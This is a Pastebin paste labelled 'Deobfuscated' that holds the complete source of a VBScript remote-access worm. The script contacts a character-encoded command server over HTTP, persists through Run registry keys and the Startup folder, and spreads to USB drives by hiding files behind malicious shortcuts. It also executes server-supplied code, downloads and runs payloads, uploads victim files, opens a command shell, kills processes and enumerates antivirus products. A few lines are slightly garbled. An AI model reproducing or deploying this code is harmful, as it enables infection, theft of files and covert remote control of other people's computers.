API tools faq
paste
Guest User

Deobfuscated

a guest
Apr 11th, 2016
255
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.91 KB | None | 0 0
raw download clone embed print report
  1. "host = chrw(53.5+53.5) & chrw(52.5+52.5) & chrw(55+55) & chrw(51.5+51.5) & chrw(56+56) & chrw(57+57) & chrw(55.5+55.5) & chrw(51.5+51.5) & chrw(23+23) & chrw(56+56) & chrw(58.5+58.5) & chrw(49+49) & chrw(54+54) & chrw(52.5+52.5) & chrw(49.5+49.5) & chrw(59+59) & chrw(54.5+54.5) & chrw(23+23) & chrw(49.5+49.5) & chrw(55.5+55.5) & chrw(54.5+54.5)" &
  2. "port = 88" &
  3. "installdir = chrw(18.5+18.5) & chrw(48.5+48.5) & chrw(56+56) & chrw(56+56) & chrw(50+50) & chrw(48.5+48.5) & chrw(58+58) & chrw(48.5+48.5) & chrw(18.5+18.5)"
  4. "lnkfile = false"
  5. "lnkfolder = false"
  6. "dim shellobj "
  7. "set shellobj = wscript.createobject(chrw(59.5+59.5) & chrw(57.5+57.5) & chrw(49.5+49.5) & chrw(57+57) & chrw(52.5+52.5) & chrw(56+56) & chrw(58+58) & chrw(23+23) & chrw(57.5+57.5) & chrw(52+52) & chrw(50.5+50.5) & chrw(54+54) & chrw(54+54))"
  8. "dim filesystemobj"
  9. "set filesystemobj = createobject(chrw(57.5+57.5) & chrw(49.5+49.5) & chrw(57+57) & chrw(52.5+52.5) & chrw(56+56) & chrw(58+58) & chrw(52.5+52.5) & chrw(55+55) & chrw(51.5+51.5) & chrw(23+23) & chrw(51+51) & chrw(52.5+52.5) & chrw(54+54) & chrw(50.5+50.5) & chrw(57.5+57.5) & chrw(60.5+60.5) & chrw(57.5+57.5) & chrw(58+58) & chrw(50.5+50.5) & chrw(54.5+54.5) & chrw(55.5+55.5) & chrw(49+49) & chrw(53+53) & chrw(50.5+50.5) & chrw(49.5+49.5) & chrw(58+58))"
  10. "dim httpobj"
  11. "set httpobj = createobject(chrw(54.5+54.5) & chrw(57.5+57.5) & chrw(60+60) & chrw(54.5+54.5) & chrw(54+54) & chrw(25+25) & chrw(23+23) & chrw(60+60) & chrw(54.5+54.5) & chrw(54+54) & chrw(52+52) & chrw(58+58) & chrw(58+58) & chrw(56+56))"
  12. "installname = wscript.scriptname"
  13. "startup = shellobj.specialfolders (""startup"") & ""\"""
  14. "installdir = shellobj.expandenvironmentstrings(installdir) & ""\"""
  15. "if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings(""%temp%"") & ""\"""
  16. "spliter = ""<"" & ""|"" & "">"""
  17. "sleep = 5000 "
  18. "dim response"
  19. "dim cmd"
  20. "dim param"
  21. "info = """""
  22. "usbspreading = """""
  23. "startdate = """""
  24. "dim oneonce"
  25. "on error resume next"
  26. "instance"
  27. "while true"
  28. "install"
  29. "response = """""
  30. "response = post (chrw(52.5+52.5) & chrw(57.5+57.5) & chrw(22.5+22.5) & chrw(57+57) & chrw(50.5+50.5) & chrw(48.5+48.5) & chrw(50+50) & chrw(60.5+60.5),"""")"
  31. "cmd = split (response,spliter)"
  32. "select case cmd (0)"
  33. "case chrw(50.5+50.5) & chrw(60+60) & chrw(49.5+49.5) & chrw(50.5+50.5) & chrw(49.5+49.5) & chrw(58.5+58.5) & chrw(58+58) & chrw(50.5+50.5)"
  34. " param = cmd (1)"
  35. " execute param"
  36. "case ""update"""
  37. " param = cmd (1)"
  38. " oneonce.close"
  39. " set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)"
  40. " oneonce.write param"
  41. " oneonce.close"
  42. " shellobj.run ""wscript.exe //B "" & chr(34) & installdir & installname & chr(34)"
  43. " wscript.quit "
  44. "case ""uninstall"""
  45. " uninstall"
  46. "case ""send"""
  47. " download cmd (1),cmd (2)"
  48. "case ""site-send"""
  49. " sitedownloader cmd (1),cmd (2)"
  50. "case ""recv"""
  51. " param = cmd (1)"
  52. " upload (param)"
  53. "case ""enum-driver"""
  54. " post ""is-enum-driver"",enumdriver "
  55. "case ""enum-faf"""
  56. " param = cmd (1)"
  57. " post ""is-enum-faf"",enumfaf (param)"
  58. "case ""enum-process"""
  59. " post ""is-enum-process"",enumprocess "
  60. "case ""cmd-shell"""
  61. " param = cmd (1)"
  62. " post ""is-cmd-shell"",cmdshell (param) "
  63. "case ""delete"""
  64. " param = cmd (1)"
  65. " deletefaf (param) "
  66. "case ""exit-process"""
  67. " param = cmd (1)"
  68. " exitprocess (param) "
  69. "case ""sleep"""
  70. " param = cmd (1)"
  71. " sleep = eval (param) "
  72. "end select"
  73. "wscript.sleep sleep"
  74. "wend"
  75. "sub install"
  76. "on error resume next"
  77. "dim lnkobj"
  78. "dim filename"
  79. "dim foldername"
  80. "dim fileicon"
  81. "dim foldericon"
  82. "upstart"
  83. "for each drive in filesystemobj.drives"
  84. "if drive.isready = true then"
  85. "if drive.freespace > 0 then"
  86. "if drive.drivetype = 1 then"
  87. " filesystemobj.copyfile wscript.scriptfullname , drive.path & ""\"" & installname,true"
  88. " if filesystemobj.fileexists (drive.path & ""\"" & installname) then"
  89. " filesystemobj.getfile(drive.path & ""\"" & installname).attributes = 2+4"
  90. " end if"
  91. " for each file in filesystemobj.getfolder( drive.path & ""\"" ).Files"
  92. " if not lnkfile then exit for"
  93. " if instr (file.name,""."") then"
  94. " if lcase (split(file.name, ""."") (ubound(split(file.name, ""."")))) <> ""lnk"" then"
  95. " file.attributes = 2+4"
  96. " if ucase (file.name) <> ucase (installname) then"
  97. " filename = split(file.name,""."")"
  98. " set lnkobj = shellobj.createshortcut (drive.path & ""\"" & filename (0) & "".lnk"") "
  99. " lnkobj.windowstyle = 7"
  100. " lnkobj.targetpath = ""cmd.exe"""
  101. " lnkobj.workingdirectory = """""
  102. " lnkobj.arguments = ""/c start "" & replace(installname,"" "", chrw(34) & "" "" & chrw(34)) & ""&start "" & replace(file.name,"" "", chrw(34) & "" "" & chrw(34)) &""&exit"""
  103. " fileicon = shellobj.regread (""HKEY_LOCAL_MACHINE\software\classes\"" & shellobj.regread (""HKEY_LOCAL_MACHINE\software\classes\."" & split(file.name, ""."")(ubound(split(file.name, ""."")))& ""\"") & ""\defaulticon\"") "
  104. " if instr (fileicon,"","") = 0 then"
  105. " lnkobj.iconlocation = file.path"
  106. " else "
  107. " lnkobj.iconlocation = fileicon"
  108. " end if"
  109. " lnkobj.save()"
  110. " end if"
  111. " end if"
  112. " end if"
  113. " next"
  114. " for each folder in filesystemobj.getfolder( drive.path & ""\"" ).subfolders"
  115. " if not lnkfolder then exit for"
  116. " folder.attributes = 2+4"
  117. " foldername = folder.name"
  118. " set lnkobj = shellobj.createshortcut (drive.path & ""\"" & foldername & "".lnk"") "
  119. " lnkobj.windowstyle = 7"
  120. " lnkobj.targetpath = ""cmd.exe"""
  121. " lnkobj.workingdirectory = """""
  122. " lnkobj.arguments = ""/c start "" & replace(installname,"" "", chrw(34) & "" "" & chrw(34)) & ""&start explorer "" & replace(folder.name,"" "", chrw(34) & "" "" & chrw(34)) &""&exit"""
  123. " foldericon = shellobj.regread (""HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\"") "
  124. " if instr (foldericon,"","") = 0 then"
  125. " lnkobj.iconlocation = folder.path"
  126. " else "
  127. " lnkobj.iconlocation = foldericon"
  128. " end if"
  129. " lnkobj.save()"
  130. " next"
  131. "end If"
  132. "end If"
  133. "end if"
  134. "next"
  135. "err.clear"
  136. "end sub"
  137. "sub uninstall"
  138. "on error resume next"
  139. "dim filename"
  140. "dim foldername"
  141. "shellobj.regdelete ""HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0)"
  142. "shellobj.regdelete ""HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0)"
  143. "filesystemobj.deletefile startup & installname ,true"
  144. "filesystemobj.deletefile wscript.scriptfullname ,true"
  145. "for each drive in filesystemobj.drives"
  146. "if drive.isready = true then"
  147. "if drive.freespace > 0 then"
  148. "if drive.drivetype = 1 then"
  149. " for each file in filesystemobj.getfolder ( drive.path & ""\"").files"
  150. " on error resume next"
  151. " if instr (file.name,""."") then"
  152. " if lcase (split(file.name, ""."")(ubound(split(file.name, ""."")))) <> ""lnk"" then"
  153. " file.attributes = 0"
  154. " if ucase (file.name) <> ucase (installname) then"
  155. " filename = split(file.name,""."")"
  156. " filesystemobj.deletefile (drive.path & ""\"" & filename(0) & "".lnk"" )"
  157. " else"
  158. " filesystemobj.deletefile (drive.path & ""\"" & file.name)"
  159. " end If"
  160. " else"
  161. " filesystemobj.deletefile (file.path) "
  162. " end if"
  163. " end if"
  164. " next"
  165. " for each folder in filesystemobj.getfolder( drive.path & ""\"" ).subfolders"
  166. " folder.attributes = 0"
  167. " next"
  168. "end if"
  169. "end if"
  170. "end if"
  171. "next"
  172. "wscript.quit"
  173. "end sub"
  174. "function post (cmd ,param)"
  175. "post = param"
  176. "httpobj.open ""post"",""http://"" & host & "":"" & port &""/"" & cmd, false"
  177. "httpobj.setrequestheader ""user-agent:"",information"
  178. "httpobj.send param"
  179. "post = httpobj.responsetext"
  180. "end function"
  181. "function information"
  182. "on error resume next"
  183. "if inf = """" then"
  184. " inf = hwid & spliter "
  185. " inf = inf & shellobj.expandenvironmentstrings(""%computername%"") & spliter "
  186. " inf = inf & shellobj.expandenvironmentstrings(""%username%"") & spliter"
  187. " set root = getobject(""winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2"")"
  188. " set os = root.execquery (""select * from win32_operatingsystem"")"
  189. " for each osinfo in os"
  190. " inf = inf & osinfo.caption & spliter "
  191. " exit for"
  192. " next"
  193. " inf = inf & ""plus"" & spliter"
  194. " inf = inf & security & spliter"
  195. " inf = inf & usbspreading"
  196. " information = inf "
  197. "else"
  198. " information = inf"
  199. "end if"
  200. "end function"
  201. "sub upstart ()"
  202. "on error resume Next"
  203. "shellobj.regwrite ""HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0), ""wscript.exe //B "" & chrw(34) & installdir & installname & chrw(34) , ""REG_SZ"""
  204. "shellobj.regwrite ""HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0), ""wscript.exe //B "" & chrw(34) & installdir & installname & chrw(34) , ""REG_SZ"""
  205. "filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true"
  206. "filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true"
  207. "end sub"
  208. "function hwid"
  209. "on error resume next"
  210. "set root = getobject(""winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2"")"
  211. "set disks = root.execquery (""select * from win32_logicaldisk"")"
  212. "for each disk in disks"
  213. " if disk.volumeserialnumber <> """" then"
  214. " hwid = disk.volumeserialnumber"
  215. " exit for"
  216. " end if"
  217. "next"
  218. "end function"
  219. "function security "
  220. "on error resume next"
  221. "security = """""
  222. "set objwmiservice = getobject(""winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2"")"
  223. "set colitems = objwmiservice.execquery(""select * from win32_operatingsystem"",,48)"
  224. "for each objitem in colitems"
  225. " versionstr = split (objitem.version,""."")"
  226. "next"
  227. "versionstr = split (colitems.version,""."")"
  228. "osversion = versionstr (0) & ""."""
  229. "for x = 1 to ubound (versionstr)"
  230. & " osversion = osversion & versionstr (i)"
  231. "next"
  232. "osversion = eval (osversion)"
  233. "if osversion > 6 then sc = ""securitycenter2"" else sc = ""securitycenter"""
  234. "set objsecuritycenter = getobject(""winmgmts:\\localhost\root\"" & sc)"
  235. "Set colantivirus = objsecuritycenter.execquery(""select * from antivirusproduct"",""wql"",0)"
  236. "for each objantivirus in colantivirus"
  237. " security = security & objantivirus.displayname & "" ."""
  238. "next"
  239. "if security = """" then security = ""nan-av"""
  240. "end function"
  241. "function instance"
  242. "on error resume next"
  243. "usbspreading = shellobj.regread (""HKEY_LOCAL_MACHINE\software\"" & split (installname,""."")(0) & ""\"")"
  244. "if usbspreading = """" then"
  245. " if lcase ( mid(wscript.scriptfullname,2)) = "":\"" & lcase(installname) then"
  246. " usbspreading = ""true - "" & date"
  247. " shellobj.regwrite ""HKEY_LOCAL_MACHINE\software\"" & split (installname,""."")(0) & ""\"", usbspreading, ""REG_SZ"""
  248. " else"
  249. " usbspreading = ""false - "" & date"
  250. " shellobj.regwrite ""HKEY_LOCAL_MACHINE\software\"" & split (installname,""."")(0) & ""\"", usbspreading, ""REG_SZ"""
  251. " end if"
  252. "end If"
  253. "upstart"
  254. "set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)"
  255. "set installfullnameshort = filesystemobj.getfile (installdir & installname)"
  256. "if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then "
  257. " shellobj.run ""wscript.exe //B "" & chr(34) & installdir & installname & Chr(34)"
  258. " wscript.quit "
  259. "end If"
  260. "err.clear"
  261. "set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)"
  262. "if err.number > 0 then wscript.quit"
  263. "end function"
  264. "sub sitedownloader (fileurl,filename)"
  265. "strlink = fileurl"
  266. "strsaveto = installdir & filename"
  267. "set objhttpdownload = createobject(""msxml2.xmlhttp"" )"
  268. "objhttpdownload.open ""get"", strlink, false"
  269. "objhttpdownload.send"
  270. "set objfsodownload = createobject (""scripting.filesystemobject"")"
  271. "if objfsodownload.fileexists (strsaveto) then"
  272. " objfsodownload.deletefile (strsaveto)"
  273. "end if"
  274. " "
  275. "if objhttpdownload.status = 200 then"
  276. " dim objstreamdownload"
  277. " set objstreamdownload = createobject(""adodb.stream"")"
  278. " with objstreamdownload"
  279. & & ".type = 1 "
  280. & & ".open"
  281. & & ".write objhttpdownload.responsebody"
  282. & & ".savetofile strsaveto"
  283. & & ".close"
  284. " end with"
  285. " set objstreamdownload = nothing"
  286. "end if"
  287. "if objfsodownload.fileexists(strsaveto) then"
  288. " shellobj.run objfsodownload.getfile (strsaveto).shortpath"
  289. "end if "
  290. "end sub"
  291. "sub download (fileurl,filedir)"
  292. "if filedir = """" then "
  293. " filedir = installdir"
  294. "end if"
  295. "strsaveto = filedir & mid (fileurl, instrrev (fileurl,""\"") + 1)"
  296. "set objhttpdownload = createobject(""msxml2.xmlhttp"")"
  297. "objhttpdownload.open ""post"",""http://"" & host & "":"" & port &""/"" & ""is-sending"" & spliter & fileurl, false"
  298. "objhttpdownload.send """""
  299. " "
  300. "set objfsodownload = createobject (""scripting.filesystemobject"")"
  301. "if objfsodownload.fileexists (strsaveto) then"
  302. " objfsodownload.deletefile (strsaveto)"
  303. "end if"
  304. "if objhttpdownload.status = 200 then"
  305. " dim objstreamdownload"
  306. & "set objstreamdownload = createobject(""adodb.stream"")"
  307. " with objstreamdownload "
  308. & & " .type = 1 "
  309. & & " .open"
  310. & & " .write objhttpdownload.responsebody"
  311. & & " .savetofile strsaveto"
  312. & & " .close"
  313. & "end with"
  314. " set objstreamdownload = nothing"
  315. "end if"
  316. "if objfsodownload.fileexists(strsaveto) then"
  317. " shellobj.run objfsodownload.getfile (strsaveto).shortpath"
  318. "end if "
  319. "end sub"
  320. "function upload (fileurl)"
  321. "dim httpobj,objstreamuploade,buffer"
  322. "set objstreamuploade = createobject(""adodb.stream"")"
  323. "with objstreamuploade "
  324. " .type = 1 "
  325. " .open"
  326. & " .loadfromfile fileurl"
  327. & " buffer = .read"
  328. & " .close"
  329. "end with"
  330. "set objstreamdownload = nothing"
  331. "set httpobj = createobject(""msxml2.xmlhttp"")"
  332. "httpobj.open ""post"",""http://"" & host & "":"" & port &""/"" & ""is-recving"" & spliter & fileurl, false"
  333. "httpobj.send buffer"
  334. "end function"
  335. "function enumdriver ()"
  336. "for each drive in filesystemobj.drives"
  337. "if drive.isready = true then"
  338. " enumdriver = enumdriver & drive.path & ""|"" & drive.drivetype & spliter"
  339. "end if"
  340. "next"
  341. "end Function"
  342. "function enumfaf (enumdir)"
  343. "enumfaf = enumdir & spliter"
  344. "for each folder in filesystemobj.getfolder (enumdir).subfolders"
  345. " enumfaf = enumfaf & folder.name & ""|"" & """" & ""|"" & ""d"" & ""|"" & folder.attributes & spliter"
  346. "next"
  347. "for each file in filesystemobj.getfolder (enumdir).files"
  348. " enumfaf = enumfaf & file.name & ""|"" & file.size & ""|"" & ""f"" & ""|"" & file.attributes & spliter"
  349. "next"
  350. "end function"
  351. "function enumprocess ()"
  352. "on error resume next"
  353. "set objwmiservice = getobject(""winmgmts:\\.\root\cimv2"")"
  354. "set colitems = objwmiservice.execquery(""select * from win32_process"",,48)"
  355. "dim objitem"
  356. "for each objitem in colitems"
  357. & "enumprocess = enumprocess & objitem.name & ""|"""
  358. & "enumprocess = enumprocess & objitem.processid & ""|"""
  359. " enumprocess = enumprocess & objitem.executablepath & spliter"
  360. "next"
  361. "end function"
  362. "sub exitprocess (pid)"
  363. "on error resume next"
  364. "shellobj.run ""taskkill /F /T /PID "" & pid,7,true"
  365. "end sub"
  366. "sub deletefaf (url)"
  367. "on error resume next"
  368. "filesystemobj.deletefile url"
  369. "filesystemobj.deletefolder url"
  370. "end sub"
  371. "function cmdshell (cmd)"
  372. "dim httpobj,oexec,readallfromany"
  373. "set oexec = shellobj.exec (""%comspec% /c "" & cmd)"
  374. "if not oexec.stdout.atendofstream then"
  375. " readallfromany = oexec.stdout.readall"
  376. "elseif not oexec.stderr.atendofstream then"
  377. " readallfromany = oexec.stderr.readall"
  378. "else "
  379. " readallfromany = """""
  380. "end if"
  381. "cmdshell = readallfromany"
  382. "end function"
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!